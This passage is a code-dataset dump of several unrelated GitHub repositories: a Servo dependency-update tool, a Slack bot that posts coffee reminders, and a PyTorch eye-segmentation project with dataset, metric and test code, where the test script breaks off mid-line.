python3-pip\n```\n\nInstall the necessary python3 modules\n```\n sudo python3 -m pip install gitpython github3.py\n```\n\nClone the servo-based repo (servo or the forked instance of servo)\n```\n git clone https://github.com/servo/servo.git\n```\n\nNavigate to the new directory\n```\n cd servo\n```\n\nClone the servo-dependency-tool repo (must be inside the root servo folder)\n```\n git clone https://github.com/chbrown13/servo-dependency-tool.git\n```\n\nRun the tool\n```\n sudo python3 servo_dependency_tool.py\n```" }, { "alpha_fraction": 0.6024096608161926, "alphanum_fraction": 0.6044176816940308, "avg_line_length": 47.225807189941406, "blob_id": "a3ad8be35a5cd12fff9a49ac170f3911b8d8cf00", "content_id": "bb3d1c3008cbfcd1d19a3c199c6279201c2df1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1494, "license_type": "no_license", "max_line_length": 111, "num_lines": 31, "path": "/run_cargo_update.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\n\ndef run_update(git_path, pkg):\n print(\"Running update for %s\" % pkg.name)\n if os.path.isfile(os.path.join(git_path, 'mach')):\n mach_path = git_path + '/mach'\n args = [mach_path, 'cargo-update', '-p', pkg.name]\n else: # Otherwise use default cargo update command\n cargo_bin_path = os.path.expanduser('~/.cargo/bin/cargo')\n args = [cargo_bin_path, 'update', '-p', pkg.name]\n print('This may take a moment...')\n print(args)\n cmd_out = None\n cmd_err = None\n cmd_out, cmd_err = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n print(cmd_err.decode('utf-8'))\n if 'is ambiguous.' in cmd_err.decode('utf-8'): # If failure due to ambiguity, use precise version\n if os.path.isfile(os.path.join(git_path, 'mach')):\n mach_path = git_path + '/mach'\n args = [mach_path, 'cargo-update', '-p', (pkg.name + ':' + pkg.version)]\n else: # Otherwise use default cargo update command\n cargo_bin_path = os.path.expanduser('~/.cargo/bin/cargo')\n args = [cargo_bin_path, 'update', '-p', (pkg.name + ':' + pkg.version)]\n print('Specifying version %s...' % pkg.version)\n print('This may take a moment...')\n print(args)\n cmd_out = None\n cmd_err = None\n cmd_out, cmd_err = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n print(cmd_err.decode('utf-8'))" }, { "alpha_fraction": 0.6355785727500916, "alphanum_fraction": 0.6597582101821899, "avg_line_length": 22.15999984741211, "blob_id": "73610c8b02c734a09d70f044d09677b2b4536d42", "content_id": "386fa8e56a6bdb5a8ce20f759f4fc19bda68a0df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 579, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": "/test/Cargo.toml", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "[package]\nname = \"cargo-toml\"\nauthors = [\"Q\",\n \"Bradford\",\n \"Chris\"]\n\nversion = \"2.3\"\n\ndescription = \"This is a test cargo.toml file\"\nreadme = \"README.md\"\nkeywords = [\"cargo\", \"cargo-subcommand\", \"cli\", \"dependencies\", \"crates\"]\nlicense = \"\"\n\ndocumentation = \"https://github.com/chbrown13/servo-dependency-tool\"\nhomepage = \"https://github.com/chbrown13/servo-dependency-tool\"\nrepository = \"https://github.com/chbrown13/servo-dependency-tool\"\n\n[[bin]]\nname = \"cargo-list\"\npath = \"path/to/bin\"\n\n[dependencies]\nservo = \"0.0.0\"\ntoml = \"0.0\"\nrustc-serialize = \"0\"\n" } ]
13
jordansimonovski/coffee-bot
https://github.com/jordansimonovski/coffee-bot
6be525a8da90e489ec108092183b528597c58104
4d1aac20db767e22c9acfdf624f2aa452e407640
9790b15d1e1d0be21c026ebcbfae180ddfcdb6ef
refs/heads/master
2021-01-23T01:56:40.692372
2017-05-31T06:51:04
2017-05-31T06:51:04
92,901,684
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 26, "blob_id": "1e11176478e9416c1c1457b93bffa590f370f21a", "content_id": "6aad16db2a842da987a5c7cc4fece36e1defc2a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27, "license_type": "no_license", "max_line_length": 26, "num_lines": 1, "path": "/modules/__init__.py", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "__all__ = ['promptCoffee']\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.687747061252594, "avg_line_length": 23.095237731933594, "blob_id": "1166970e5641f4ca366cca35f08887ed004989d3", "content_id": "e9d2415f7be4d3e4355193a612e8a56892be3d90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 506, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/modules/slackConnector.py", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "import requests\nimport json\nimport os\n\nslackWebhook = os.environ.get('slack_webhook')\n\ndef buildMessage(question, imageUrl):\n\tslackMessage = {\n\t\t\"response_type\": \"in_channel\",\n\t\t\"attachments\": [{\n\t\t\t\"text\": question,\n\t\t\t\"color\": \"#3AA3E3\",\n\t\t\t\"attachment_type\": \"default\",\n \"image_url\": imageUrl\n\t\t}]\n\t}\n\treturn json.dumps(slackMessage)\n\ndef sendMessage(question, imageUrl):\n\tslackMessage = buildMessage(question, imageUrl)\n\tresponse = requests.post(slackWebhook, data=slackMessage)\n" }, { "alpha_fraction": 0.6383952498435974, "alphanum_fraction": 0.6637048721313477, "avg_line_length": 47.2337646484375, "blob_id": "035751ef69af961157df941c9c4932ff52e5b427", "content_id": "cf0aa0449b6716a508d74bd12a501d20b23249ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3714, "license_type": "no_license", "max_line_length": 133, "num_lines": 77, "path": "/modules/promptCoffee.py", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "import slackConnector\nimport random\nimport os\nfrom datetime import *\nimport pytz\n\ntz = pytz.timezone(\"Australia/Sydney\")\n\ncoffeePlaces = [\"Cafe XXII\",\"La Tienda Cafe\",\"harris.miller\",\"Le Trader\",\"the Nespresso Machine\", \"that Cafe on Level 3\", \"Bar Zini\"]\ncoffeeGifs = [\n \"https://media.giphy.com/media/l0MYAqn2iVLPTRGUw/giphy.gif\",\n \"https://media.giphy.com/media/l0MYAqn2iVLPTRGUw/giphy.gif\",\n \"https://media.giphy.com/media/oZEBLugoTthxS/giphy.gif\",\n \"https://media.giphy.com/media/zJ8ldRaGLnHTa/giphy.gif\",\n \"https://media.giphy.com/media/687qS11pXwjCM/giphy.gif\",\n \"https://media.giphy.com/media/10sKNgit3jiU2A/giphy.gif\",\n \"https://media.giphy.com/media/ceeFbVxiZzMBi/giphy.gif\",\n \"https://media.giphy.com/media/NJokhR7GCs0uY/giphy.gif\",\n \"https://media.giphy.com/media/R1fqW7QTkR8je/giphy.gif\",\n \"https://media.giphy.com/media/R5MzmBwjgu7UA/giphy.gif\",\n \"https://media.giphy.com/media/c2Enke05DX6F2/giphy.gif\",\n \"https://media.giphy.com/media/V3MlKQ1G0pV3G/giphy.gif\",\n \"https://media.giphy.com/media/zVcSYlq1DqTYs/giphy.gif\",\n \"https://media.giphy.com/media/NHUONhmbo448/giphy.gif\",\n \"https://media.giphy.com/media/5xaYLxI6riEuY/giphy.gif\",\n \"https://media.giphy.com/media/l2JI4zgwXw5IfyssE/giphy.gif\",\n \"https://media.giphy.com/media/xThuWjDsB8IbJggCME/giphy.gif\",\n \"https://media.giphy.com/media/11Lz1Y4n1f2j96/giphy.gif\",\n \"https://media.giphy.com/media/4WpvHyRMXCoww/giphy.gif\",\n \"https://media.giphy.com/media/13Y7TygzhUgT28/giphy.gif\",\n \"https://media.giphy.com/media/xTiTnLIpvL5o1tBy5W/giphy.gif\",\n \"https://media.giphy.com/media/xUySTv9gnqA5rDCKWs/giphy.gif\",\n \"https://media.giphy.com/media/oj05uAreWGy8U/giphy.gif\",\n \"https://media.giphy.com/media/3o6MbaY2SJYZvHctMY/giphy.gif\",\n \"https://media.giphy.com/media/oAzEHPyMlMHXW/giphy.gif\",\n \"https://media.giphy.com/media/w9XH7o9BbuLok/giphy.gif\",\n \"https://media.giphy.com/media/uAtUk9luIYL1C/giphy.gif\",\n \"https://media.giphy.com/media/7hLRKL65FxCuY/giphy.gif\",\n \"https://media.giphy.com/media/6n7d5NJoCSKfS/giphy.gif\",\n \"https://media.giphy.com/media/F6d5oNpTLssQ8/giphy.gif\"\n ]\n\nquestions = [\n \"It's that time of the day for some coffee from {0}\",\n \"Coffee? \\n I hear {0} does great coffee.\",\n \"Who wants some caffeinated goodness from {0}\",\n \"{0}. You guys in?\",\n \"Coffee comrades! \\n Time for some coffee from {0}\",\n \"COFFEE, COFFEE, COFFEE, COFFEE, COFFEE, COFFEE! \\n Let's go to {0}\",\n \"Nothing like having some warm, creamy coffee slide down your throat at {0}\",\n \"Guise. Time. For. Coffee. \\n {0}?\",\n \"Oh would you look at the time? \\n It looks like it's time for some coffee from {0}\",\n \"What's that in your hands? \\n It's not coffee. Maybe you should get some from {0}\",\n \"Ding ding ding! Coffee Time! \\n You should check out {0} today.\",\n \"Coffee. {0}. Nuff said.\",\n \"Hey you guys wanna go get some coffee? I'm thinking {0} today.\",\n \"Need. Coffee. \\n Brain no worky. \\n Go to {0}\"\n\t]\n\ndef checkDay():\n today = datetime.now(pytz.utc)\n localisedToday = today.astimezone(tz)\n return localisedToday.strftime(\"%A\")\n\ndef askQuestion():\n coffeeGif = random.choice(coffeeGifs)\n day = checkDay()\n if day in dayActions:\n slackConnector.sendMessage(dayActions[day], coffeeGif)\n else:\n cafe = random.choice(coffeePlaces)\n\tquestion = random.choice(questions)\n\tslackConnector.sendMessage(question.format(cafe), coffeeGif)\n\ndayActions = {\n \"Tuesday\": \"Cheap Tuesdays at Antidote. Go go go!\"\n}\n" }, { "alpha_fraction": 0.3414634168148041, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 12.666666984558105, "blob_id": "a47ea9fff823fdef75c78d47ba795584e11e237e", "content_id": "9ad6725b0fd021004d1f597113574a085d8d3fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 41, "license_type": "no_license", "max_line_length": 13, "num_lines": 3, "path": "/requirements.txt", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "zappa==0.41.1\nflask==0.12.1\npytz==2017.2\n" } ]
4
maheshkumarmadire/TechGig-Challenges
https://github.com/maheshkumarmadire/TechGig-Challenges
83dac59ca3c87f9344960f71644c0cf0ab1da380
60b9ee35bb8e434aa3a5cf2178d01a89fc3bd964
15e305956549f983fa2f7f5dec2247c7c211f4af
refs/heads/master
2020-05-19T13:11:06.464445
2019-05-05T13:15:04
2019-05-05T13:15:04
185,033,093
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4632478654384613, "alphanum_fraction": 0.48547008633613586, "avg_line_length": 16.08823585510254, "blob_id": "3a49c749ad4a8c8770b98c078abed516a4467c22", "content_id": "3e7489345ea225e16e02880839733e4e64634cd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 53, "num_lines": 34, "path": "/win_or_lose.py", "repo_name": "maheshkumarmadire/TechGig-Challenges", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[19]:\n\nimport numpy as np;\nt = int(input())\nwhile t > 0:\n N = int(input()) # take single Integer input\n arr_v=input() # takes the whole line of n numbers\n arr_p=input() # takes the whole line of n numbers\n V = list(map(int,arr_v.split(' ')))\n P = list(map(int,arr_p.split(' ')))\n V.sort(reverse=True)\n P.sort(reverse=True)\n i=0\n win=0\n while i < N:\n if P[i] <= V[i]:\n win=1\n i=i+1\n if win==1 :\n print(\"LOSE\")\n else :\n print(\"WIN\")\n \n t=t-1\n\n\n# In[14]:\n\nP[0]\n\n\n# In[ ]:\n\n\n\n" }, { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 20, "blob_id": "895c84064040f7505e448512efb006f4150d2740", "content_id": "8e203afe193c9adb39beeaaf107af71a0e76dee1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 21, "license_type": "no_license", "max_line_length": 20, "num_lines": 1, "path": "/README.md", "repo_name": "maheshkumarmadire/TechGig-Challenges", "src_encoding": "UTF-8", "text": "# TechGig-Challenges\n" } ]
2
ZhiminWang96/Eye_VR_Segmentation
https://github.com/ZhiminWang96/Eye_VR_Segmentation
1574227005e956e20538a7fd58bceda01ff8ea4a
43ea78c1c7da12a16a54c987e3c5793b0c0da4e2
f0355cc448bcab863bd7f8898ecfc020098db61c
refs/heads/master
2023-06-11T07:14:59.559648
2021-06-16T06:13:30
2021-06-16T06:13:30
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5837163329124451, "alphanum_fraction": 0.6861457824707031, "avg_line_length": 51.517242431640625, "blob_id": "eb21aab15c48b55ec0f300636ffe41dfba842781", "content_id": "97dffaa224abf0af10ba476d6ff23480ad867eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 288, "num_lines": 29, "path": "/README.md", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "## Eye Semantic Segmentation with a Lightweight Model\nAR/VR Eye Semantic Segmentation with Open Eye Dataset [1] in OpenEDS Semantic Segmentation Challenge 2019.\n- Best mIoU: **0.9491**\n- Number of trainable parameters: **104728**\n\n\nV. T. Huynh, S. Kim, G. Lee and H. Yang, \"Eye Semantic Segmentation with A Lightweight Model,\" *2019 IEEE/CVF International Conference on Computer Vision Workshop (ICCVW)*, Seoul, Korea (South), 2019, pp. 3694-3697, doi: [10.1109/ICCVW.2019.00457](https://ieeexplore.ieee.org/document/9022251).\n```\n@INPROCEEDINGS{9022251, \n author={V. T. {Huynh} and S. {Kim} and G. {Lee} and H. {Yang}}, \n booktitle={2019 IEEE/CVF International Conference on Computer Vision Workshop (ICCVW)}, \n title={Eye Semantic Segmentation with A Lightweight Model}, \n year={2019}, \n pages={3694-3697},\n}\n```\n\nV. T. Huynh, H. Yang, G. Lee and S. Kim, \"Semantic Segmentation of the Eye With a Lightweight Deep Network and Shape Correction,\" in *IEEE Access*, vol. 8, pp. 131967-131974, 2020, doi: [10.1109/ACCESS.2020.3010011](https://ieeexplore.ieee.org/document/9143078).\n```\n@ARTICLE{9143078, \n author={V. T. {Huynh} and H. {Yang} and G. {Lee} and S. {Kim}}, \n journal={IEEE Access}, \n title={Semantic Segmentation of the Eye With a Lightweight Deep Network and Shape Correction}, \n year={2020}, \n volume={8}, \n pages={131967-131974},\n}\n```\n[1] Garbin, Stephan J., Yiru Shen, Immo Schuetz, Robert Cavin, Gregory Hughes, and Sachin S. Talathi. \"OpenEDS: Open Eye Dataset.\" arXiv preprint arXiv:1905.03702 (2019).\n" }, { "alpha_fraction": 0.5734816789627075, "alphanum_fraction": 0.5859063267707825, "avg_line_length": 29.902578353881836, "blob_id": "08182e1b0adf410fcb41960d8885a5cf54e7a354", "content_id": "c8ae7949988dae259ffd21d8869d39ff3b9837e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10785, "license_type": "no_license", "max_line_length": 112, "num_lines": 349, "path": "/src/utils.py", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "import glob\nimport os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchsummary\nfrom PIL import Image\nfrom skimage import measure\nfrom torch.utils import data\nfrom torchvision import transforms\nfrom tqdm import tqdm\n\n\n# __all__ = ['OpenEDS']\n\n\nclass ToTensor(object):\n \"\"\" Convert ndarrays in sample to Tensors\"\"\"\n\n def __call__(self, sample):\n img, mask, name = np.asarray(sample['image']), sample['mask'], sample['name']\n\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n # img is gray scale image\n img = img[np.newaxis, :] / 255.0\n # img = img.transpose((2, 0, 1)) / 255.0\n return {'image': torch.from_numpy(img).type(torch.FloatTensor),\n 'mask': torch.from_numpy(mask).type(torch.LongTensor), 'name': name}\n\n\nclass Rescale(object):\n \"\"\" Rescale the image in a sample to a given size \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, float, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n img, mask, name = sample['image'], sample['mask'], sample['name']\n w, h = img.size # PIL image, size return w, h\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n elif isinstance(self.output_size, float):\n new_h, new_w = self.output_size * h, self.output_size * w\n else:\n new_h, new_w = self.output_size\n\n new_h = int(new_h)\n new_w = int(new_w)\n img = transforms.Resize((new_h, new_w))(img)\n\n return {'image': img, 'mask': mask, 'name': name}\n\n\nclass Brightness(object):\n \"\"\" Rescale the image in a sample to a given size \"\"\"\n\n def __init__(self, brightness):\n self.brightness = brightness\n\n def __call__(self, sample):\n img, mask, name = sample['image'], sample['mask'], sample['name']\n\n img = transforms.ColorJitter(brightness=self.brightness)(img)\n\n return {'image': img, 'mask': mask, 'name': name}\n\n\nclass Normalize(object):\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, sample):\n img, mask, name = sample['image'], sample['mask'], sample['name']\n img = transforms.Normalize(mean=self.mean, std=self.std)(img)\n return {'image': img, 'mask': mask, 'name': name}\n\n\nclass OpenEDS(data.Dataset):\n def __init__(self, root_path, transform=None):\n \"\"\" Initialization \"\"\"\n self.list_png = sorted(glob.glob(root_path + '/images/*.png'))\n self.transform = transform\n\n def __len__(self):\n \"\"\" Denotes the toal number of samples \"\"\"\n return len(self.list_png)\n\n @staticmethod\n def adjust_gamma(image, gamma=1.0):\n # build a lookup table mapping the pixel values [0, 255] to\n # their adjusted gamma values\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n\n # apply gamma correction using the lookup table\n return cv2.LUT(image, table)\n\n def __getitem__(self, index):\n img_path = self.list_png[index]\n npy_path = img_path.replace('images', 'labels').replace('png', 'npy')\n\n # img = cv2.imread(img_path)\n # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # img = Image.fromarray(img)\n # img = io.imread(img_path, as_gray=True)\n # img = Image.open(img_path.replace('png', 'bmp')).convert('L')\n img = Image.open(img_path)#.convert('L') # Original images\n if img.mode == 'RGB':\n img = img.convert('L')\n\n if 'test' in img_path:\n npy = np.array([])\n else:\n npy = np.load(npy_path, allow_pickle=False)\n\n img_name = img_path.replace('\\\\', '/').split('/')[-1][:-4]\n sample = {'image': img, 'mask': npy, 'name': img_name}\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n\n\"\"\" Define metrics \"\"\"\n\n\ndef pixel_acc(pred, label):\n acc = torch.eq(pred, label).type(torch.FloatTensor).mean()\n return acc\n\n\ndef mean_iou(pred, label, num_classes=4):\n \"\"\"\n Mean IoU\n :param pred:\n :param label:\n :param num_classes:\n :return:\n \"\"\"\n accum = False\n iou = None\n for idx in range(num_classes):\n out1 = (pred == idx)\n out2 = (label == idx)\n\n intersect = torch.sum(out1 & out2, dim=(1, 2)).type(torch.FloatTensor)\n union = torch.sum(out1 | out2, dim=(1, 2)).type(torch.FloatTensor)\n if accum:\n iou = iou + torch.div(intersect, union + 1e-16)\n else:\n iou = torch.div(intersect, union + 1e-16)\n accum = True\n m_iou = torch.mean(iou) / num_classes\n return m_iou\n\n\ndef adjust_learning_rate(optimizer, lr):\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr\n\n\ndef save_checkpoint(dir, epoch, **kwargs):\n state = {\n 'epoch': epoch,\n }\n state.update(kwargs)\n filepath = os.path.join(dir, 'checkpoint-%d.pt' % epoch)\n torch.save(state, filepath)\n\n\ndef visualize(pred, label, idx=None):\n fig = plt.figure()\n ax1 = fig.add_subplot(121)\n ax1.imshow(pred)\n ax1.set_title('Predicted')\n\n ax2 = fig.add_subplot(122)\n ax2.imshow(label)\n ax2.set_title('Ground truth')\n\n if idx is not None:\n os.makedirs('./viz/', exist_ok=True)\n plt.savefig('./viz/{}.png'.format(idx))\n plt.clf()\n plt.close()\n del fig\n\n\ndef train_epoch(loader, model, criterion, optimizer, device='cuda:0'):\n loss_sum = 0.0\n eval_pixel_acc = []\n eval_mean_iou = []\n\n model.train()\n\n for i, sample_batched in enumerate(loader):\n input = sample_batched['image'].to(device)\n target = sample_batched['mask'].to(device)\n\n optimizer.zero_grad()\n\n out_probs, out_cat = model(input)\n loss = criterion(out_probs, target, device=device)\n\n loss.backward()\n optimizer.step()\n\n loss_sum += loss.item()\n eval_pixel_acc.append(pixel_acc(out_cat, target))\n eval_mean_iou.append(mean_iou(out_cat, target))\n\n eval_pixel_acc = np.mean(eval_pixel_acc)\n eval_mean_iou = np.mean(eval_mean_iou)\n return {\n 'loss': loss_sum,\n 'accuracy': eval_pixel_acc,\n 'mIOU': eval_mean_iou\n }\n\n\ndef eval(loader, model, criterion, device='cuda:0', viz=None):\n loss_sum = 0.0\n eval_pixel_acc = []\n eval_mean_iou = []\n\n model.eval()\n\n for i, sample_batched in enumerate(loader):\n input = sample_batched['image'].to(device)\n target = sample_batched['mask'].to(device)\n\n out_probs, out_cat = model(input)\n loss = criterion(out_probs, target, device=device)\n\n loss_sum += loss.item()\n eval_pixel_acc.append(pixel_acc(out_cat, target))\n eval_mean_iou.append(mean_iou(out_cat, target))\n\n # if viz is not None:\n # visualize(out_cat[1 + len(sample_batched) // 2].cpu().numpy(),\n # target[1 + len(sample_batched) // 2].cpu().numpy(), viz)\n # viz = None\n\n eval_mean_iou = np.mean(eval_mean_iou)\n eval_pixel_acc = np.mean(eval_pixel_acc)\n\n return {\n 'loss': loss_sum,\n 'accuracy': eval_pixel_acc,\n 'mIOU': eval_mean_iou\n }\n\n\ndef weighted_CrossEntropyLoss(output, target, device, n_classes=4):\n \"\"\" Weighted Cross Entropy Loss\"\"\"\n n_pixel = target.numel()\n _, counts = torch.unique(target, return_counts=True)\n cls_weight = torch.div(n_pixel, n_classes * counts.type(torch.FloatTensor)).to(device)\n loss = F.cross_entropy(output, target, weight=cls_weight)\n\n return loss\n\n\ndef generalised_dice_loss_ce(output, target, device, n_classes=4, type_weight='simple', add_crossentropy=False):\n n_pixel = target.numel()\n _, counts = torch.unique(target, return_counts=True)\n cls_weight = torch.div(n_pixel, n_classes * counts.type(torch.FloatTensor)).to(device)\n\n if type_weight == 'square':\n cls_weight = torch.pow(cls_weight, 2.0)\n\n if add_crossentropy:\n loss_entropy = F.nll_loss(torch.log(output), target, weight=cls_weight)\n\n if len(target.size()) == 3:\n # Convert to one hot encoding\n encoded_target = F.one_hot(target.to(torch.int64), num_classes=n_classes)\n encoded_target = encoded_target.permute(0, 3, 1, 2).to(torch.float)\n else:\n encoded_target = target.clone().to(torch.float)\n # print(output.size(), encoded_target.size(), target.size(), len)\n assert output.size() == encoded_target.size()\n\n intersect = torch.sum(torch.mul(encoded_target, output), dim=(2, 3))\n union = torch.sum(output, dim=(2, 3)) + torch.sum(encoded_target, dim=(2, 3))\n union[union < 1] = 1\n\n gdl_numerator = torch.sum(torch.mul(cls_weight, intersect), dim=1)\n gdl_denominator = torch.sum(torch.mul(cls_weight, union), dim=1)\n generalised_dice_score = torch.sub(1.0, 2 * gdl_numerator / gdl_denominator)\n\n if add_crossentropy:\n loss = 0.5 * torch.mean(generalised_dice_score) + 0.5 * loss_entropy\n else:\n loss = torch.mean(generalised_dice_score)\n\n return loss\n\n\ndef test_writer(model, device, test_loader, write_folder='./test/predicts/'):\n \"\"\" Run on test loader \"\"\"\n print('Write test results')\n model.eval()\n for i, sample_batched in enumerate(tqdm(test_loader)):\n input = sample_batched['image'].to(device)\n # target = sample_batched['mask'].to(device)\n\n out_probs, out_cat = model(input)\n\n img_names = sample_batched['name']\n img_mask_predict = out_cat.cpu().numpy().astype(np.uint8)\n for idx in range(img_mask_predict.shape[0]):\n cur_predict = img_mask_predict[idx, :, :]\n cur_name = img_names[idx]\n\n fig = plt.figure()\n ax1 = fig.add_subplot(131)\n ax1.imshow(cur_predict)\n ax1.set_title('Predicted')\n\n cur_predict_ref = eye_refinement(cur_predict)\n np.save(write_folder + cur_name, cur_predict_ref)\n ax2 = fig.add_subplot(132)\n ax2.imshow(cur_predict_ref)\n ax2.set_title('Refine Predicted')\n\n ax3 = fig.add_subplot(133)\n ax3.imshow(input.cpu().numpy()[idx, 0, :, :], cmap='gray')\n ax3.set_title('Image')\n\n plt.savefig('{}{}{}.png'.format(write_folder, 'imgs/', cur_name))\n plt.clf()\n plt.close()\n del fig\n\n model.train()\n torchsummary.summary(model, (1, 320, 200))\n" }, { "alpha_fraction": 0.5072174072265625, "alphanum_fraction": 0.5370158553123474, "avg_line_length": 40.280235290527344, "blob_id": "f66f0736eabc0337572df2bbe50f630e8e309887", "content_id": "41288d0d03f34ac66ef75d2d65f1db184e150ed9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13994, "license_type": "no_license", "max_line_length": 146, "num_lines": 339, "path": "/src/test.py", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "import argparse\nimport gc\nimport os\nimport sys\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torchsummary\nfrom scipy import signal\nfrom scipy.interpolate import interp1d\nfrom scipy.spatial import ConvexHull\nfrom skimage import measure\nfrom torchvision import transforms\nfrom tqdm import tqdm\n\nimport utils\nfrom train import MobileNetV2_CS\nfrom utils import OpenEDS, Rescale, ToTensor, Normalize\n\n\ndef eye_refinement(img, img_name=None):\n \"\"\"\n Eye Refinement\n :param img:\n :param img_name:\n :return:\n \"\"\"\n\n def re_label(img, value, ipf=None):\n \"\"\"\n Re-label img with value (0, 1, 2)\n :param img:\n :param value:\n :param ipf:\n :return:\n \"\"\"\n\n def fill_holes(img, expr=lambda x: x > 0):\n img_binary = 255 * expr(img).astype(np.uint8)\n img_tmp = img_binary.copy()\n h, w = img_tmp.shape\n mask = np.zeros((h + 2, w + 2), np.uint8)\n\n cv2.floodFill(img_tmp, mask, (0, 0), 255)\n cv2.floodFill(img_tmp, mask, (0, 639), 255)\n img_fill = np.bitwise_or(img_binary, ~img_tmp)\n\n return img_fill\n\n img_filled = fill_holes(img, lambda x: x > value)\n\n # Remove small regions (not eye region)\n mask_regions, n_regions = measure.label(img_filled, connectivity=2, return_num=True)\n ld_area = -1\n idx = 0\n prev_idx = 0\n\n for props in measure.regionprops(mask_regions, img):\n idx = idx + 1\n if props.area > ld_area and (value > 0 or (value == 0 and props.max_intensity > 1)):\n ld_area = props.area\n img_filled[mask_regions == prev_idx] = 0\n prev_idx = idx\n else:\n img_filled[mask_regions == idx] = 0\n\n rf = ipf\n if value == 0:\n # Remove false region with peaks analysis\n horizontal_projection = np.sum(img_filled > 0, axis=1)\n peakind, _ = signal.find_peaks(horizontal_projection, distance=img_filled.shape[1] / 8)\n if len(peakind) >= 2:\n fp = -1\n if horizontal_projection[peakind[0]] > horizontal_projection[peakind[1]]:\n fp = peakind[0]\n sp = peakind[1]\n elif len(peakind) >= 3 and horizontal_projection[peakind[1]] > horizontal_projection[peakind[2]]:\n fp = peakind[1]\n sp = peakind[2]\n\n if fp > -1:\n clr_index = np.argmin(horizontal_projection[fp: sp]) + fp\n img_filled[clr_index:, :] = 0\n\n _, contours, _ = cv2.findContours((img_filled > 0).astype(np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnt = contours[0]\n hull = cv2.convexHull(cnt, returnPoints=False, clockwise=True)\n x_index = cnt[hull[1:, 0], :, 0].flatten()\n end_index = np.argwhere(x_index[1:] < x_index[:-1])[0][0] + 1\n line_below_index = np.arange(hull[0, 0], hull[end_index, 0])\n emid = np.argwhere(hull[end_index + 1:, 0] < hull[end_index:-1, 0])[0][0] + end_index\n line_above_index = np.hstack(\n [np.arange(hull[end_index, 0], hull[emid, 0]), np.arange(hull[emid + 1, 0], hull[-1, 0]), np.arange(hull[-1, 0], hull[0, 0])])\n x_below = contours[0][line_below_index, :, 0].flatten()\n pk_below, _ = signal.find_peaks(x_below, width=img_filled.shape[1] * 1 / 20)\n\n if len(pk_below) > 0:\n cnt_refined = np.vstack(\n [contours[0][line_below_index[:pk_below[0]], :, :], contours[0][line_above_index, :, :]])\n cnt_mask = np.zeros(img_filled.shape, dtype=np.uint8)\n cv2.drawContours(cnt_mask, [cnt_refined], -1, (255), -1)\n cnt_mask[:, np.max(x_below[:pk_below[0]]):] = 0\n img_filled[(255 - cnt_mask).astype(np.bool)] = 0\n\n print(img_name)\n\n _, contours, _ = cv2.findContours((img_filled > value).astype(np.uint8), cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n cnt = contours[0]\n hull = cv2.convexHull(cnt, returnPoints=False, clockwise=True)\n x_index = cnt[hull[1:, 0], :, 0].flatten()\n end_index = np.argwhere(x_index[1:] < x_index[:-1])[0][0] + 1\n line_below_index = np.arange(hull[0, 0], hull[end_index, 0])\n emid = np.argwhere(hull[end_index + 1:, 0] < hull[end_index:-1, 0])[0][0] + end_index\n line_above_index = np.hstack(\n [np.arange(hull[end_index, 0], hull[emid, 0]), np.arange(hull[emid + 1, 0], hull[-1, 0]), np.arange(hull[-1, 0], hull[0, 